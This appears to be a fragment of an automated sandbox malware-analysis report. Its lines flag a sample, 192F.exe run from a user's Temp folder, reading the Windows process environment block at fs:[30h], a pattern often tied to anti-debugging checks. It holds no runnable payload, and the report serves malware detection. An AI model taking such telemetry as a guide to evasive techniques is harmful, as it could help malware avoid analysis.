Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8B58 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8B58
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F358 mov eax, dword ptr fs:[00000030h] 29_2_6A91F358
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B5A mov eax, dword ptr fs:[00000030h] 29_2_6A943B5A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F340 mov eax, dword ptr fs:[00000030h] 29_2_6A91F340
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91DB40 mov eax, dword ptr fs:[00000030h] 29_2_6A91DB40
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B7A mov eax, dword ptr fs:[00000030h] 29_2_6A943B7A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6365 mov eax, dword ptr fs:[00000030h] 29_2_6A9A6365
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913880 mov eax, dword ptr fs:[00000030h] 29_2_6A913880
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6A91E8B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94F0BF mov ecx, dword ptr fs:[00000030h] 29_2_6A94F0BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94F0BF mov eax, dword ptr fs:[00000030h] 29_2_6A94F0BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9238A4 mov eax, dword ptr fs:[00000030h] 29_2_6A9238A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9238A4 mov ecx, dword ptr fs:[00000030h] 29_2_6A9238A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9590AF mov eax, dword ptr fs:[00000030h] 29_2_6A9590AF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228AE mov eax, dword ptr fs:[00000030h] 29_2_6A9228AE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228AE mov ecx, dword ptr fs:[00000030h] 29_2_6A9228AE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9170C0 mov eax, dword ptr fs:[00000030h] 29_2_6A9170C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9228FD mov eax, dword ptr fs:[00000030h] 29_2_6A9228FD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9140E1 mov eax, dword ptr fs:[00000030h] 29_2_6A9140E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CE0E9 mov eax, dword ptr fs:[00000030h] 29_2_6A9CE0E9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B8E4 mov eax, dword ptr fs:[00000030h] 29_2_6A93B8E4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9158EC mov eax, dword ptr fs:[00000030h] 29_2_6A9158EC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF019 mov eax, dword ptr fs:[00000030h] 29_2_6A9EF019
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F018 mov eax, dword ptr fs:[00000030h] 29_2_6A91F018
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E4015 mov eax, dword ptr fs:[00000030h] 29_2_6A9E4015
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916800 mov eax, dword ptr fs:[00000030h] 29_2_6A916800
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916800 mov eax, dword ptr fs:[00000030h] 29_2_6A916800
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916800 mov eax, dword ptr fs:[00000030h] 29_2_6A916800
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A928800 mov eax, dword ptr fs:[00000030h] 29_2_6A928800
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A830 mov eax, dword ptr fs:[00000030h] 29_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A830 mov eax, dword ptr fs:[00000030h] 29_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A830 mov eax, dword ptr fs:[00000030h] 29_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93A830 mov eax, dword ptr fs:[00000030h] 29_2_6A93A830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944020 mov edi, dword ptr fs:[00000030h] 29_2_6A944020
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92B02A mov eax, dword ptr fs:[00000030h] 29_2_6A92B02A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92B02A mov eax, dword ptr fs:[00000030h] 29_2_6A92B02A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92B02A mov eax, dword ptr fs:[00000030h] 29_2_6A92B02A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92B02A mov eax, dword ptr fs:[00000030h] 29_2_6A92B02A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915050 mov eax, dword ptr fs:[00000030h] 29_2_6A915050
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915050 mov eax, dword ptr fs:[00000030h] 29_2_6A915050
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915050 mov eax, dword ptr fs:[00000030h] 29_2_6A915050
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A917055 mov eax, dword ptr fs:[00000030h] 29_2_6A917055
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E1074 mov eax, dword ptr fs:[00000030h] 29_2_6A9E1074
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D2073 mov eax, dword ptr fs:[00000030h] 29_2_6A9D2073
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93F86D mov eax, dword ptr fs:[00000030h] 29_2_6A93F86D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944190 mov eax, dword ptr fs:[00000030h] 29_2_6A944190
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942990 mov eax, dword ptr fs:[00000030h] 29_2_6A942990
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91519E mov eax, dword ptr fs:[00000030h] 29_2_6A91519E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91519E mov ecx, dword ptr fs:[00000030h] 29_2_6A91519E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93C182 mov eax, dword ptr fs:[00000030h] 29_2_6A93C182
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94A185 mov eax, dword ptr fs:[00000030h] 29_2_6A94A185
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DA189 mov eax, dword ptr fs:[00000030h] 29_2_6A9DA189
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DA189 mov ecx, dword ptr fs:[00000030h] 29_2_6A9DA189
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9951BE mov eax, dword ptr fs:[00000030h] 29_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9951BE mov eax, dword ptr fs:[00000030h] 29_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9951BE mov eax, dword ptr fs:[00000030h] 29_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9951BE mov eax, dword ptr fs:[00000030h] 29_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C9BF mov eax, dword ptr fs:[00000030h] 29_2_6A94C9BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C9BF mov eax, dword ptr fs:[00000030h] 29_2_6A94C9BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF1B5 mov eax, dword ptr fs:[00000030h] 29_2_6A9EF1B5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF1B5 mov eax, dword ptr fs:[00000030h] 29_2_6A9EF1B5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov eax, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov eax, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov eax, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov ecx, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9399BF mov eax, dword ptr fs:[00000030h] 29_2_6A9399BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9461A0 mov eax, dword ptr fs:[00000030h] 29_2_6A9461A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9461A0 mov eax, dword ptr fs:[00000030h] 29_2_6A9461A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D49A4 mov eax, dword ptr fs:[00000030h] 29_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D49A4 mov eax, dword ptr fs:[00000030h] 29_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D49A4 mov eax, dword ptr fs:[00000030h] 29_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D49A4 mov eax, dword ptr fs:[00000030h] 29_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9299C7 mov eax, dword ptr fs:[00000030h] 29_2_6A9299C7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9299C7 mov eax, dword ptr fs:[00000030h] 29_2_6A9299C7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9299C7 mov eax, dword ptr fs:[00000030h] 29_2_6A9299C7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9299C7 mov eax, dword ptr fs:[00000030h] 29_2_6A9299C7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B1E1 mov eax, dword ptr fs:[00000030h] 29_2_6A91B1E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B1E1 mov eax, dword ptr fs:[00000030h] 29_2_6A91B1E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B1E1 mov eax, dword ptr fs:[00000030h] 29_2_6A91B1E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9131E0 mov eax, dword ptr fs:[00000030h] 29_2_6A9131E0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A41E8 mov eax, dword ptr fs:[00000030h] 29_2_6A9A41E8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E89E7 mov eax, dword ptr fs:[00000030h] 29_2_6A9E89E7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E9ED mov eax, dword ptr fs:[00000030h] 29_2_6A91E9ED
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919100 mov eax, dword ptr fs:[00000030h] 29_2_6A919100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919100 mov eax, dword ptr fs:[00000030h] 29_2_6A919100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919100 mov eax, dword ptr fs:[00000030h] 29_2_6A919100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A920100 mov eax, dword ptr fs:[00000030h] 29_2_6A920100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A920100 mov eax, dword ptr fs:[00000030h] 29_2_6A920100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A920100 mov eax, dword ptr fs:[00000030h] 29_2_6A920100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913138 mov ecx, dword ptr fs:[00000030h] 29_2_6A913138
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94513A mov eax, dword ptr fs:[00000030h] 29_2_6A94513A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94513A mov eax, dword ptr fs:[00000030h] 29_2_6A94513A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 mov eax, dword ptr fs:[00000030h] 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 mov eax, dword ptr fs:[00000030h] 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 mov eax, dword ptr fs:[00000030h] 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 mov eax, dword ptr fs:[00000030h] 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 mov ecx, dword ptr fs:[00000030h] 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91395E mov eax, dword ptr fs:[00000030h] 29_2_6A91395E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91395E mov eax, dword ptr fs:[00000030h] 29_2_6A91395E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B944 mov eax, dword ptr fs:[00000030h] 29_2_6A93B944
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B944 mov eax, dword ptr fs:[00000030h] 29_2_6A93B944
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B171 mov eax, dword ptr fs:[00000030h] 29_2_6A91B171
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B171 mov eax, dword ptr fs:[00000030h] 29_2_6A91B171
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8966 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8966
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DE962 mov eax, dword ptr fs:[00000030h] 29_2_6A9DE962
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DE9E mov eax, dword ptr fs:[00000030h] 29_2_6A94DE9E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DE9E mov eax, dword ptr fs:[00000030h] 29_2_6A94DE9E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DE9E mov eax, dword ptr fs:[00000030h] 29_2_6A94DE9E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913E80 mov eax, dword ptr fs:[00000030h] 29_2_6A913E80
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913E80 mov eax, dword ptr fs:[00000030h] 29_2_6A913E80
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A2EA3 mov eax, dword ptr fs:[00000030h] 29_2_6A9A2EA3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9946A7 mov eax, dword ptr fs:[00000030h] 29_2_6A9946A7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8ED6 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8ED6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9436CC mov eax, dword ptr fs:[00000030h] 29_2_6A9436CC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9276E2 mov eax, dword ptr fs:[00000030h] 29_2_6A9276E2
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A953EE4 mov eax, dword ptr fs:[00000030h] 29_2_6A953EE4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A953EE4 mov eax, dword ptr fs:[00000030h] 29_2_6A953EE4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A953EE4 mov eax, dword ptr fs:[00000030h] 29_2_6A953EE4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9416E0 mov ecx, dword ptr fs:[00000030h] 29_2_6A9416E0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A2E14 mov eax, dword ptr fs:[00000030h] 29_2_6A9A2E14
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91C600 mov eax, dword ptr fs:[00000030h] 29_2_6A91C600
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91C600 mov eax, dword ptr fs:[00000030h] 29_2_6A91C600
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91C600 mov eax, dword ptr fs:[00000030h] 29_2_6A91C600
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFE3F mov eax, dword ptr fs:[00000030h] 29_2_6A9CFE3F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C63D mov eax, dword ptr fs:[00000030h] 29_2_6A94C63D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91A63B mov eax, dword ptr fs:[00000030h] 29_2_6A91A63B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91A63B mov eax, dword ptr fs:[00000030h] 29_2_6A91A63B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A950E21 mov eax, dword ptr fs:[00000030h] 29_2_6A950E21
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A995623 mov eax, dword ptr fs:[00000030h] 29_2_6A995623
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6652 mov eax, dword ptr fs:[00000030h] 29_2_6A9A6652
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943E70 mov eax, dword ptr fs:[00000030h] 29_2_6A943E70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CF674 mov eax, dword ptr fs:[00000030h] 29_2_6A9CF674
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CE6C mov eax, dword ptr fs:[00000030h] 29_2_6A94CE6C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CE6C mov ecx, dword ptr fs:[00000030h] 29_2_6A94CE6C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99AE60 mov eax, dword ptr fs:[00000030h] 29_2_6A99AE60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99AE60 mov eax, dword ptr fs:[00000030h] 29_2_6A99AE60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99AE60 mov eax, dword ptr fs:[00000030h] 29_2_6A99AE60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99AE60 mov eax, dword ptr fs:[00000030h] 29_2_6A99AE60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92766D mov eax, dword ptr fs:[00000030h] 29_2_6A92766D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov ecx, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 mov eax, dword ptr fs:[00000030h] 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913FC5 mov eax, dword ptr fs:[00000030h] 29_2_6A913FC5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913FC5 mov eax, dword ptr fs:[00000030h] 29_2_6A913FC5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913FC5 mov eax, dword ptr fs:[00000030h] 29_2_6A913FC5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D7CA mov eax, dword ptr fs:[00000030h] 29_2_6A94D7CA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D7CA mov eax, dword ptr fs:[00000030h] 29_2_6A94D7CA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9537F5 mov eax, dword ptr fs:[00000030h] 29_2_6A9537F5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB mov eax, dword ptr fs:[00000030h] 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CDF1D mov ecx, dword ptr fs:[00000030h] 29_2_6A9CDF1D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CDF1D mov eax, dword ptr fs:[00000030h] 29_2_6A9CDF1D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944710 mov eax, dword ptr fs:[00000030h] 29_2_6A944710
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93F716 mov eax, dword ptr fs:[00000030h] 29_2_6A93F716
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9AFF10 mov eax, dword ptr fs:[00000030h] 29_2_6A9AFF10
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9AFF10 mov eax, dword ptr fs:[00000030h] 29_2_6A9AFF10
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C707 mov eax, dword ptr fs:[00000030h] 29_2_6A94C707
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C707 mov ecx, dword ptr fs:[00000030h] 29_2_6A94C707
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C707 mov eax, dword ptr fs:[00000030h] 29_2_6A94C707
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916730 mov eax, dword ptr fs:[00000030h] 29_2_6A916730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916730 mov eax, dword ptr fs:[00000030h] 29_2_6A916730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916730 mov eax, dword ptr fs:[00000030h] 29_2_6A916730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94E730 mov eax, dword ptr fs:[00000030h] 29_2_6A94E730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B73D mov eax, dword ptr fs:[00000030h] 29_2_6A93B73D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B73D mov eax, dword ptr fs:[00000030h] 29_2_6A93B73D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914F2E mov eax, dword ptr fs:[00000030h] 29_2_6A914F2E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914F2E mov eax, dword ptr fs:[00000030h] 29_2_6A914F2E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F mov eax, dword ptr fs:[00000030h] 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91A745 mov eax, dword ptr fs:[00000030h] 29_2_6A91A745
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DF4C mov eax, dword ptr fs:[00000030h] 29_2_6A94DF4C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
